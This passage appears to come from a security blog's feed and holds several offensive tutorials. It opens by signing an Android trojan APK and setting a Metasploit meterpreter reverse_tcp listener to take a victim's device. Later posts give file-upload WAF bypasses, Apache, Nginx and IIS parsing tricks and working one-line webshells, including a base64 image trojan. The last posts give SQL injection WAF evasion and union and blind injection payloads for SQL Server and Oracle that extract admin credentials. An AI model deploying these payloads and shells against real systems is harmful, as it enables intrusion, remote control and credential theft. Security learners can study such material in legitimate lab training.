<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm"><span class="hljs-comment"># generate a signing key</span><br>keytool -genkey -v -keystore apk-trojan-key.keystore -alias aliasname -keyalg RSA -keysize <span class="hljs-number">1024</span> -validity <span class="hljs-number">999</span><br><br><span class="hljs-keyword">jarsigner </span>-verbose -sigalg <span class="hljs-keyword">SHA1withRSA </span>-<span class="hljs-keyword">digestalg </span><span class="hljs-keyword">SHA1 </span>-keystore apk-trojan-key.keystore 文件名.apk aliasname<br><br><span class="hljs-comment"># verify the signature</span><br><span class="hljs-keyword">jarsigner </span>-verify 文件名.apk<br></code></pre></td></tr></table></figure>
<p>11. Set up the msf listener:</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs gams">msfconsole<br>use exploit/multi/handler<br><span class="hljs-keyword">set</span> payload <span class="hljs-comment">android</span>/meterpreter/<span class="hljs-comment">reverse_tcp</span><br><span class="hljs-keyword">set</span> <span class="hljs-comment">LHOST 192.168.149.128</span> //<span class="hljs-comment">the Kali machine's own IP</span><br><span class="hljs-keyword">set</span> <span class="hljs-comment">LPORT 9055</span> //<span class="hljs-comment">port to listen on for the callback; must match the one used when generating the trojan</span><br>exploit //start the listener<br></code></pre></td></tr></table></figure>
<p>Once the target calls back, we can stop the ARP attack.</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="Summary"></a>Summary</h2>
<p>The Android trojan's capabilities go well beyond what is shown here; the rest is for you to explore on your own. That concludes this tutorial. Finally, a reminder once more not to do anything illegal. Thank you!</p>]]></content>
<categories>
<category>Wireless security</category>
</categories>
<tags>
<tag>kali pentesting</tag>
</tags>
</entry>
<entry>
<title>File Upload (3): WAF Bypass Ideas</title>
<link href="/2021/10/09/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%EF%BC%88%E4%B8%89%EF%BC%89-WAF%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF/"/>
<url>/2021/10/09/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%EF%BC%88%E4%B8%89%EF%BC%89-WAF%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF/</url>
<content type="html"><![CDATA[<p>Here I use the well-known <code>upload-labs</code> file upload practice range for the demonstration; the images were lost when the blog was migrated, qwq.</p>
<p>Note: WAF products are constantly updated and their blocking techniques keep improving, so the methods described here may be outdated; apply them flexibly! The bypass techniques here only apply to blacklists; whitelists can only be dealt with in combination with file inclusion or the IIS 7.5 parsing vulnerability!</p>
<h2 id="常用思路"><a href="#常用思路" class="headerlink" title="Common approaches"></a>Common approaches</h2>
<p>1. Bypass via extension case variation</p>
<p>2. Bypass via doubled extension</p>
<p>3. Bypass via file naming rules: try slashes (forward and back), asterisks, colons (a colon empties the file contents), question marks, |, and <> </p>
<h2 id="骚姿势"><a href="#骚姿势" class="headerlink" title="Fancy tricks"></a>Fancy tricks</h2>
<p>1. Pad the <code>Content-Disposition</code> field of the HTTP request header with junk strings</p>
<p>2. The <code>filename</code> field of the HTTP request header:</p>
<ul><li>add multiple equals signs</li><li>put a line break in the extension</li><li>swap single and double quotes</li><li>multiple fields</li><li><code><</code> or <code>;</code> in place of <code>.</code></li><li>append three <code><<<</code> after the extension</li><li>delete one quote</li><li>replace the quote with ` or add ` before the quote</li><li>00 truncation</li></ul>
<p>3. Chunked transfer encoding</p>
<p>4. Non-path truncation</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">1</span>.php;jpg<br><span class="hljs-attribute">1</span>.php%<span class="hljs-number">00</span>.jpg<br><span class="hljs-attribute">1</span>.php/<span class="hljs-number">00</span>.jpg<br></code></pre></td></tr></table></figure>
<p>In practice one usually builds a local environment, installs the target machine's WAF, and then fuzzes with burpsuite or a self-written Python script to determine which characters are filtered. Beyond bypassing the upload filter, also pay attention to webshell AV evasion and traffic detection.</p>
<p>That is all I can think of for now; if you have better ideas, leave a comment. Thanks!</p>]]></content>
<categories>
<category>Web security</category>
</categories>
<tags>
<tag>fuzzing</tag>
<tag>file upload</tag>
</tags>
</entry>
<entry>
<title>File Upload (2): Apache and Nginx</title>
<link href="/2021/10/07/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%EF%BC%88%E4%BA%8C%EF%BC%89-Apache%E5%92%8CNginx/"/>
<url>/2021/10/07/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%EF%BC%88%E4%BA%8C%EF%BC%89-Apache%E5%92%8CNginx/</url>
<content type="html"><![CDATA[<p>Next let us summarise several more file upload vulnerabilities related to middleware and HTTP request headers; none of them depends on the client or server operating system.</p>
<h2 id="Apache"><a href="#Apache" class="headerlink" title="Apache"></a>Apache</h2>
<h3 id="文件名解析漏洞"><a href="#文件名解析漏洞" class="headerlink" title="Filename parsing vulnerability"></a>Filename parsing vulnerability</h3>
<p>Because Apache parses file extensions from right to left, we can bypass checks by appending an extension Apache does not recognise. For example, to upload a PHP trojan, we can name the file "*.php.123", where "123" is an extension Apache does not recognise; Apache then parses the "php" extension to its left, achieving the bypass.</p>
<h3 id="htaccess"><a href="#htaccess" class="headerlink" title=".htaccess"></a>.htaccess</h3>
<p>In Apache, the .htaccess file lets users customise directory management. We can create a new ".htaccess" file and write custom content into it, for example:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs htaccess"><FilesMatch "test"><br> SetHandler application/x-httpd-php<br></FilesMatch><br></code></pre></td></tr></table></figure>
<p>Apache will then execute any file whose name contains "test" as PHP. Using this feature, we can get Apache to parse an image trojan this way.</p>
<h3 id="Nginx"><a href="#Nginx" class="headerlink" title="Nginx"></a>Nginx</h3>
<h3 id="文件名解析漏洞-1"><a href="#文件名解析漏洞-1" class="headerlink" title="Filename parsing vulnerability"></a>Filename parsing vulnerability</h3>
<p>Most sites use a whitelist to restrict uploaded file types, but we can append "*.php" to the path of the uploaded file, for example <code>https://www.example.com/upload/1.png/2.php</code>. When Nginx parses "2.php" in the URL, since we never actually uploaded that file, Nginx looks to the parent path, i.e. it parses the "1.png" we actually uploaded as a PHP file. Here "1.png" is really a big or small shell with its extension changed.</p>
<h2 id="PHP"><a href="#PHP" class="headerlink" title="PHP"></a>PHP</h2>
<h3 id="user-ini"><a href="#user-ini" class="headerlink" title=".user.ini"></a>.user.ini</h3>
<p>Similar to Apache's <code>.htaccess</code> configuration file above, <code>.user.ini</code> is a user-defined PHP configuration file; we can use it to build and hide backdoors.</p>
<p>Two PHP configuration directives are useful here:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php">auto_prepend_file = <filename> <span class="hljs-comment">//included at the start of the file</span><br>auto_append_file = <filename> <span class="hljs-comment">//included at the end of the file</span><br></code></pre></td></tr></table></figure>
<p>These two directives act like a file inclusion, for example:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">// .user.ini</span><br>auto_prepend_file = <span class="hljs-number">1</span>.jpg<br><span class="hljs-comment">// 1.jpg</span><br><span class="hljs-meta"><?php</span> <span class="hljs-title function_ invoke__">phpinfo</span>();<span class="hljs-meta">?></span><br><span class="hljs-comment">// 1.php (any php file)</span><br></code></pre></td></tr></table></figure>
<p>Provided these three files are in the same directory, it is as if the statement require('1.jpg') had been inserted into 1.php, performing a file inclusion.</p>
<p>The other directive includes at the end of the file and stops working if an exit statement is encountered.</p>
<p>.user.ini applies widely: it is not limited to Apache but works on Nginx too, as long as the server runs PHP in FastCGI mode (the non-thread-safe build typically uses FastCGI).</p>
<p><strong>It also has limitations.</strong> As stated, this directive in .user.ini includes the specified file from the other .php files in the same directory, so a .php file must exist in that directory. In file upload scenarios there is usually a dedicated directory for images, and a .php file is unlikely to be there. Sometimes, though, ../ can be used to upload the file to another directory and achieve exploitation.</p>
<h3 id="base64解码"><a href="#base64解码" class="headerlink" title="base64 decoding"></a>base64 decoding</h3>
<p>PHP's <code>base64_decode</code> concatenates only the legal characters and decodes them; illegal characters are simply discarded and take no part in the overall base64 decoding. The legal characters are the following 64:</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">A</span>-Za-z0-<span class="hljs-number">9</span>/+<br></code></pre></td></tr></table></figure>
<p>The equals sign is padding, not one of the encoded characters. Using this PHP behaviour we can craft an image trojan by inserting a base64-encoded one-line shell into a normal image:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">PD89YCRfR0VUWzFdYDs7Pz4C<br><span class="hljs-comment">//after base64_decode we get:</span><br><span class="hljs-meta"><?=</span>`<span class="hljs-variable">$_GET</span>[<span class="hljs-number">1</span>]`;;<span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure>
<p>Usage: <code>URL?1=phpinfo()</code></p>
<h3 id="MIME类型检测"><a href="#MIME类型检测" class="headerlink" title="MIME type checking"></a>MIME type checking</h3>
<p>The server checks the "content-type" field of the HTTP request header to decide whether the file type is acceptable. Common acceptable types are image/jpeg, image/gif, image/png and so on. To exploit this, we only need to change the "content-type" field of the HTTP request header to one of these acceptable MIME types. Note, however, that "GIF89a" should be placed at the start of the file to bypass any file header check.</p>
<p><strong>What about whitelist checks? Those have to be combined with file inclusion and %00 truncation vulnerabilities. In a future note I will summarise some WAF bypass techniques.</strong></p>]]></content>
<categories>
<category>Web security</category>
</categories>
<tags>
<tag>file upload</tag>
</tags>
</entry>
<entry>
<title>File Upload (1): IIS</title>
<link href="/2021/10/06/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%EF%BC%88%E4%B8%80%EF%BC%89-IIS/"/>
<url>/2021/10/06/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%EF%BC%88%E4%B8%80%EF%BC%89-IIS/</url>
<content type="html"><![CDATA[<h2 id="形成原因"><a href="#形成原因" class="headerlink" title="Root cause"></a>Root cause</h2>
<p>A file upload vulnerability arises when insufficient control or flawed handling of the user file upload feature by the programmer lets a user exceed their own privileges and upload an executable dynamic script file to the server. The uploaded file may be a trojan, virus, malicious script, WebShell and so on. This is the most direct and effective form of attack. "File upload" itself is not the problem; the problem is how the server handles and interprets the file after it is uploaded. If the server's handling logic is not secure enough, the consequences are severe. A file upload vulnerability is extremely damaging in itself, and WebShells magnify its exploitation without limit. After most upload vulnerabilities are exploited, the attacker leaves a WebShell for convenient later access to the system.</p>
<p>What is a WebShell? A WebShell is a malicious script frequently used by hackers to gain the ability to execute operations on the server, such as running system commands, stealing user data, deleting web pages and defacing the home page; the harm is self-evident. Hackers typically exploit common vulnerabilities such as SQL injection, remote file inclusion (RFI), FTP, and even cross-site scripting (XSS) as part of social engineering attacks, ultimately taking control of the web server. WebShells are commonly written in asp (aspx), jsp and php.</p>
<h2 id="IIS文件上传漏洞"><a href="#IIS文件上传漏洞" class="headerlink" title="IIS file upload vulnerabilities"></a>IIS file upload vulnerabilities</h2>
<h3 id="目录解析漏洞"><a href="#目录解析漏洞" class="headerlink" title="Directory parsing vulnerability"></a>Directory parsing vulnerability</h3>
<p>Older IIS versions (IIS 6.0 and below) have a directory parsing vulnerability: if a folder named ".asp" is created under the upload path, every file uploaded into that folder is executed by IIS as an asp file. Even if the code restricts uploads to png, gif, jpg and the like, we can upload an <strong>image trojan</strong> so that IIS parses the <strong>one-line shell</strong> inside it, then use a connection tool such as AntSword or Behinder to browse the server's directories or even run commands.</p>
<p>If the CMS back end has no option to change the upload path, we can also capture the request with burpsuite and try to work out the correct upload path.</p>
<p>What one-line shells are there?</p>
<p>PHP: <code><?php @eval($_POST['pass']);?></code> ASP: <code><%eval request ("pass")%></code> ASPX: <code><%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%></code></p>
<p><em>The @ sign here suppresses errors: even if an error occurs it is not reported (burying one's head in the sand), so that error messages do not land in the server log and raise alarm.</em></p>
<p>How is an image trojan made? Open a normal image in Notepad, notepad++ or a similar program, append the one-line shell at the end, and save.</p>
<h3 id="文件名解析漏洞"><a href="#文件名解析漏洞" class="headerlink" title="Filename parsing vulnerability"></a>Filename parsing vulnerability</h3>
<p>Older IIS versions (IIS 6.0 and below) also have a filename parsing vulnerability: if a file is named "*.asp;.jpg", the part of the name after ";" is simply ignored, i.e. it is executed as a *.asp file. The uploaded jpg is the image trojan we prepared in advance.</p>
<h3 id="PUT攻击漏洞"><a href="#PUT攻击漏洞" class="headerlink" title="PUT attack vulnerability"></a>PUT attack vulnerability</h3>
<p>A so-called PUT attack uses the PUT method added in HTTP/1.1 to upload a trojan. If the resource already exists on the server, the later upload overwrites the earlier file; if not, the file is created on the server. That is why adding files to a server normally uses the POST method.</p>
<p>If the IIS server has WebDAV enabled and grants write permission to all users, a PUT attack is possible. First use the IIS PUT Scanner to scan the C-class (/24) range for servers open to PUT. Then rename the small shell to a txt extension, use 桂林老兵's IIS write tool to upload the txt shell via PUT, and after sending the request visit the file's location to confirm the upload succeeded. If it did, use MOVE to change the uploaded shell's name and extension (asp, aspx, php, etc.); the shell is then on the server and can be used to operate further on the target.</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="Summary"></a>Summary</h2>
<p>In the next note I will summarise several more file upload vulnerabilities related to middleware and HTTP request headers.</p>]]></content>
<categories>
<category>Web security</category>
</categories>
<tags>
<tag>file upload</tag>
</tags>
</entry>
<entry>
<title>SQL Injection (4): WAF Bypass Ideas</title>
<link href="/2021/09/27/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E5%9B%9B%EF%BC%89-WAF%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF/"/>
<url>/2021/09/27/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E5%9B%9B%EF%BC%89-WAF%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF/</url>
<content type="html"><![CDATA[<h2 id="什么是WAF"><a href="#什么是WAF" class="headerlink" title="What is a WAF"></a>What is a WAF</h2>
<p>What is a WAF? A WAF (Web Application Firewall) helps protect web applications by filtering and monitoring HTTP traffic between the web application and the Internet. It typically protects web applications against attacks such as cross-site request forgery (CSRF/SSRF), cross-site scripting (XSS), file upload and SQL injection. A WAF works at layer seven of the OSI model (the application layer) and is not meant to defend against every type of attack.</p>
<h2 id="WAF防御原理"><a href="#WAF防御原理" class="headerlink" title="How a WAF defends"></a>How a WAF defends</h2>
<p>Simply put, a WAF parses the HTTP request and uses regular expression matching to check whether the request parameters contain malicious attack behaviour. If a parameter matches the WAF's rule base, the WAF judges the request to be an attack and blocks it; otherwise it lets it through.</p>
<p>There are two common ways for SQL injection to bypass a WAF:</p>
<p>One exploits flaws the WAF may have in parsing the HTTP protocol; the other wraps and obfuscates the SQL injection statement in various ways to slip past the WAF's rule base.</p>
<h2 id="常用手法"><a href="#常用手法" class="headerlink" title="Common techniques"></a>Common techniques</h2>
<p>Note: WAF products are constantly updated and their blocking techniques keep improving, so the methods described here may be outdated; apply them flexibly!</p>
<p>1. Encryption/decryption: usually XOR or md5 is used to encrypt the payload.</p>
<p>2. Encoding/decoding: base64, hex, Unicode, URL...</p>
<p>3. Equivalent (obscure) functions: e.g. <code>hex()</code> and <code>bin()</code> are equivalent to <code>ascii()</code>; <code>mid()</code> and <code>substring()</code> are equivalent to <code>substr()</code>; and so on.</p>
<p>4. Special characters: inserting certain special characters has no effect on the database. For example, to find out which database is in use, <code>select database();</code> suffices, but nine times out of ten the WAF will block it; we can then add special characters before database, such as <code>~</code>, <code>!</code>, <code>{</code>, <code>\n</code>, single or double quotes, and the like.</p>
<p>5. Mixing comment markers: as everyone knows, MySQL has several comment markers, such as <code>#</code>, <code>-- =</code>, <code>/**/</code>.</p>
<p>6. Space substitution: spaces in SQL statements can be replaced with <code>+</code>, <code>:</code> or their URL encodings.</p>
<p>7. Newlines: in URL encoding, <code>%23</code> stands for <code>#</code> and <code>%0A</code> for a newline. We can add them to the payload to confuse the WAF.</p>
<p>8. Case variation: e.g. <code>sElECt</code>, <code>dATaBasE()</code>.</p>
<p>9. Keyword doubling: e.g. <code>selselectect</code>.</p>
<p>10. Splitting: take union injection as an example. If we remove <code>union</code> the WAF does not block; remove <code>select</code> instead and it still does not block. Only when the two are used together is the request blocked, because <code>union select</code> is the union query the WAF blocks.</p>
<p>So the bypass idea is to keep the two apart while the SQL statement still executes. For example, put comment markers inside both union and select, giving <code>uni/**/on /**/select</code>, and so on.</p>
<p>Take querying the current database as another example: try splitting <code>database()</code>. Entering just <code>database</code> is not blocked; entering a lone parenthesis <code>(</code> is not blocked either, since that is not valid syntax. From this we see that what is blocked is neither <code>database</code> nor <code>()</code> but <code>database()</code> as a whole. So the bypass should separate <code>database</code> from <code>()</code> without affecting database execution; achieve that and the WAF is bypassed.</p>
<h2 id="骚姿势"><a href="#骚姿势" class="headerlink" title="Fancy tricks"></a>Fancy tricks</h2>
<p>Above were the common techniques; below are fancy tricks I learned from other masters:</p>
<p>1. Sending GET and POST in the same request</p>
<p>2. Junk strings</p>
<p>3. Inline comments: e.g. the form <code>/*!50000aaa*/</code>; when 50000 is less than the current MySQL version number the comment is not in effect (the content executes), and when it is greater the comment takes effect.</p>
<p>4. Regular expression function (<code>regexp()</code>)</p>
<p>5. Scripting language quirks: e.g. <code>%00</code> truncation only works with aspx+mssql</p>
<p>6. Keyword substitution: <code>and</code> can be replaced with <code>&&</code>, <code>or</code> with <code>||</code>, and <code>(1,2)</code> with <code>from 1 to 2</code>.</p>
<p>In practice one usually builds a local environment, installs the target machine's WAF, and then fuzzes with burpsuite or a self-written Python script to determine which characters are filtered.</p>
<p>That is all I can think of for now; if you have better ideas, leave a comment. Thanks!</p>]]></content>
<categories>
<category>Web security</category>
</categories>
<tags>
<tag>fuzzing</tag>
<tag>SQL injection</tag>
</tags>
</entry>
<entry>
<title>SQL Injection (3): SQL Server and Oracle Injection</title>
<link href="/2021/09/21/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E4%B8%89%EF%BC%89-SQL-server%E5%92%8COracle%E6%B3%A8%E5%85%A5/"/>
<url>/2021/09/21/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E4%B8%89%EF%BC%89-SQL-server%E5%92%8COracle%E6%B3%A8%E5%85%A5/</url>
<content type="html"><![CDATA[<h1 id="SQL-server和Oracle数据库注入"><a href="#SQL-server和Oracle数据库注入" class="headerlink" title="SQL Server and Oracle database injection"></a>SQL Server and Oracle database injection</h1>
<h2 id="简介"><a href="#简介" class="headerlink" title="Introduction"></a>Introduction</h2>
<p>MS SQL refers to Microsoft's <a href="https://baike.baidu.com/item/SQL">SQL Server</a> <a href="https://baike.baidu.com/item/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%8D%E5%8A%A1%E5%99%A8">database server</a>. It is a database platform that provides a complete solution from server to client; its database server component is a <a href="https://baike.baidu.com/item/%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/1239101">database management system</a> used to create, use and maintain databases.</p>
<p>Oracle Database, also known as Oracle RDBMS or simply Oracle, is a <a href="https://baike.baidu.com/item/%E5%85%B3%E7%B3%BB%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/11032386">relational database management system</a> from <a href="https://baike.baidu.com/item/%E7%94%B2%E9%AA%A8%E6%96%87%E5%85%AC%E5%8F%B8/430115">Oracle Corporation</a>. It has long been a leading product in the database field. The Oracle database system is one of the most popular <a href="https://baike.baidu.com/item/%E5%85%B3%E7%B3%BB%E6%95%B0%E6%8D%AE%E5%BA%93/1237340">relational database</a> management systems in the world today, with good <a href="https://baike.baidu.com/item/%E5%8F%AF%E7%A7%BB%E6%A4%8D%E6%80%A7/6931884">portability</a>, ease of use and rich functionality, suitable for large, medium and small <a href="https://baike.baidu.com/item/%E5%BE%AE%E6%9C%BA/5511409">microcomputer</a> environments. It is an efficient, reliable database solution built for high <a href="https://baike.baidu.com/item/%E5%90%9E%E5%90%90%E9%87%8F/157092">throughput</a>.</p>
<p><strong>Note: the highest privilege in SQL Server is sa, and in Oracle it is dba. Extension: the highest privilege on Windows is system (not admin!), and on Linux it is root.</strong></p>
<h2 id="注入方式"><a href="#注入方式" class="headerlink" title="Injection methods"></a>Injection methods</h2>
<h3 id="SQL-server"><a href="#SQL-server" class="headerlink" title="SQL Server"></a>SQL Server</h3>
<h4 id="联合查询注入"><a href="#联合查询注入" class="headerlink" title="Union query injection"></a>Union query injection</h4>
<p>1. As usual, first determine whether an injection point exists.</p>
<p>2. Use order by to guess the column count; note that a union query does not show duplicate rows, so sometimes all must be added after union.</p>
<p>3. Use a union query to find the echo position. This differs slightly here: because SQL Server requires the data type to be specified, single quotes are needed when testing. For example: <code>?id=1' union select null,'null',null #</code> Assuming three columns and guessing that the second is the echo position, wrap the second null in single quotes. If the page echoes null, the second column is the echo position. Multiple echo positions follow the same pattern.</p>
<p>4. Dump the database name</p>
<p>For example: <code>?id=1' union select null,(select db_name()),null #</code></p>
<p>5. Dump tables</p>
<p>For example: <code>?id=1' union select null,(select top 1 字段名 from 库名.dbo.sysobjects where xtype='u'),null #</code></p>
<p>Here sysobjects is a table specific to SQL Server, and u denotes user-created tables.</p>
<p>6. Dump columns</p>
<p>For example: <code>?id=1' union select null,(select top 1 col_name(object_id('表名'),n) from sysobjects),null #</code></p>
<p>Here n is the column ordinal; the first column is usually id.</p>
<p>7. Dump values</p>
<p>For example: <code>?id=1' union select null,(select top 1 字段名 from 表名),null #</code></p>
<p><em>Extension:</em></p>
<p><em>View the current database version:</em> <code>?id=1' union select null,(select @@version),null #</code></p>
<h4 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="Boolean-based blind injection"></a>Boolean-based blind injection</h4>
<h4 id="时间盲注"><a href="#时间盲注" class="headerlink" title="Time-based blind injection"></a>Time-based blind injection</h4>
<h4 id="报错注入"><a href="#报错注入" class="headerlink" title="Error-based injection"></a>Error-based injection</h4>
<h4 id="其它方式"><a href="#其它方式" class="headerlink" title="Other methods"></a>Other methods</h4>
<p>Just run sqlmap, or use the Super SQL Injection Tool (超级SQL注入工具).</p>
<h3 id="Oracle"><a href="#Oracle" class="headerlink" title="Oracle"></a>Oracle</h3>
<h4 id="联合查询注入-1"><a href="#联合查询注入-1" class="headerlink" title="Union query injection"></a>Union query injection</h4>
<p>1. As usual, first determine whether an injection point exists.</p>
<p>2. Use order by to guess the column count; note that a union query does not show duplicate rows, so sometimes all must be added after union.</p>
<p>3. Use a union query to find the echo position. This differs slightly: Oracle also requires the data type to be specified and the test is the same as for SQL Server, but Oracle requires every query to name a table. For example: <code>?id=1' union select null,'null',null from dual#</code></p>
<p>Here dual is a table specific to Oracle.</p>
<p>4. Dump the database name</p>
<p>For example: <code>?id=1' union select null,(select instance_name from V$INSTANCE),null from dual #</code></p>
<p>5. Dump tables</p>
<p>For example: <code>?id=1' union select null,(select table_name from user_tables where rownum=1 and table_name like '%关键词%'),null from dual #</code></p>
<p><strong>Remember to add rownum=1, because Oracle can only show one row at a time here. The keyword might be a sensitive word such as user or admin.</strong></p>
<p>6. Dump columns</p>
<p>For example: <code>?id=1' union select null,(select column_name from user_tab_columns where rownum=1 and table_name='表名'),null from dual #</code></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">' union select null,(select column_name from user_tab_columns where rownum=1 and table_name='</span>表名<span class="hljs-string">' and column_name not in ('</span>字段名<span class="hljs-number">1</span><span class="hljs-string">','</span>字段名<span class="hljs-number">2</span><span class="hljs-string">',...,'</span>字段名n<span class="hljs-string">')),null from dual #</span><br></code></pre></td></tr></table></figure>
<p>7. Dump values</p>
<p>For example: <code>?id=1' union select null,(select 字段名1,字段名2,...,字段名n from "表名"),null from dual #</code></p>
<p><strong>Note that the actual table name must be enclosed in double quotes.</strong></p>
<p><em>Extension:</em></p>
<p><em>View the current database version:</em> <code>?id=1' union select null,(select banner from sys.v_$version where rownum=1),null from dual #</code></p>
<h4 id="布尔盲注-1"><a href="#布尔盲注-1" class="headerlink" title="Boolean-based blind injection"></a>Boolean-based blind injection</h4>
<p>0x01 Blind injection with the decode function</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">decode(字段或字段的运算,值<span class="hljs-number">1</span>,值<span class="hljs-number">2</span>,值<span class="hljs-number">3</span>)<br></code></pre></td></tr></table></figure>
<p>This function returns value 2 when the field (or an expression on the field) equals value 1, and otherwise returns value 3.</p>
<p>Values 1, 2 and 3 may of course be expressions themselves; this function makes some SQL statements much simpler.</p>
<p>Usage:</p>
<p>Comparing magnitudes: <code>select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --take the smaller value</code></p>
<p>Here the sign() function returns 0, 1 or -1 according to whether a value is zero, positive or negative.</p>
<p>Its use in injection is therefore as follows:</p>
<p>Test the current user: <code>?username=SMITH' and 1=(select decode(user,'SCOTT',1,0) from dual) --</code></p>
<p>If the user is SCOTT it returns 1, otherwise 0.</p>
<p>Characters can also be guessed one at a time using the substr() function:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?username<span class="hljs-operator">=</span>SMITH<span class="hljs-string">' and 1=(select decode(substr(user,1,1),'</span>S<span class="hljs-string">',1,0) from dual) --</span><br></code></pre></td></tr></table></figure>
<p>Get the current user</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> dual)<br></code></pre></td></tr></table></figure>
<p>Get the current version</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span> banner <span class="hljs-keyword">from</span> sys.v_$version <span class="hljs-keyword">where</span> rownum<span class="hljs-operator">=</span><span class="hljs-number">1</span>)<br></code></pre></td></tr></table></figure>
<p>Get the account and password from the admin table</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span> username<span class="hljs-operator">||</span>password <span class="hljs-keyword">from</span> admin)<br></code></pre></td></tr></table></figure>
<p>Get the string length</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> length(<span class="hljs-keyword">user</span>) <span class="hljs-keyword">from</span> dual <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure>
<p>Substitute any of the statements above for the <code>user</code> at the start.</p>
<p>For example, guessing the username character by character:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span> decode(substr(<span class="hljs-keyword">user</span>,<span class="hljs-number">2</span>,<span class="hljs-number">1</span>),<span class="hljs-string">'Y'</span>,<span class="hljs-number">1</span>,<span class="hljs-number">0</span>) <span class="hljs-keyword">from</span> dual) <span class="hljs-comment">--</span><br><br>(<span class="hljs-keyword">select</span> decode(substr(<span class="hljs-keyword">user</span>,<span class="hljs-number">3</span>,<span class="hljs-number">1</span>),<span class="hljs-string">'S'</span>,<span class="hljs-number">1</span>,<span class="hljs-number">0</span>) <span class="hljs-keyword">from</span> dual) <span class="hljs-comment">--</span><br><br>(<span class="hljs-keyword">select</span> decode(substr(<span class="hljs-keyword">user</span>,<span class="hljs-number">4</span>,<span class="hljs-number">1</span>),<span class="hljs-string">'T'</span>,<span class="hljs-number">1</span>,<span class="hljs-number">0</span>) <span class="hljs-keyword">from</span> dual) <span class="hljs-comment">--</span><br><br>(<span class="hljs-keyword">select</span> decode(substr(<span class="hljs-keyword">user</span>,<span class="hljs-number">5</span>,<span class="hljs-number">1</span>),<span class="hljs-string">'E'</span>,<span class="hljs-number">1</span>,<span class="hljs-number">0</span>) <span class="hljs-keyword">from</span> dual) <span class="hljs-comment">--</span><br><br>(<span class="hljs-keyword">select</span> decode(substr(<span class="hljs-keyword">user</span>,<span class="hljs-number">6</span>,<span class="hljs-number">1</span>),<span class="hljs-string">'N'</span>,<span class="hljs-number">1</span>,<span class="hljs-number">0</span>) <span class="hljs-keyword">from</span> dual) <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure>
<p>burpsuite can assist with semi-automated injection.</p>
<p>0x02 Blind injection with the instr function</p>
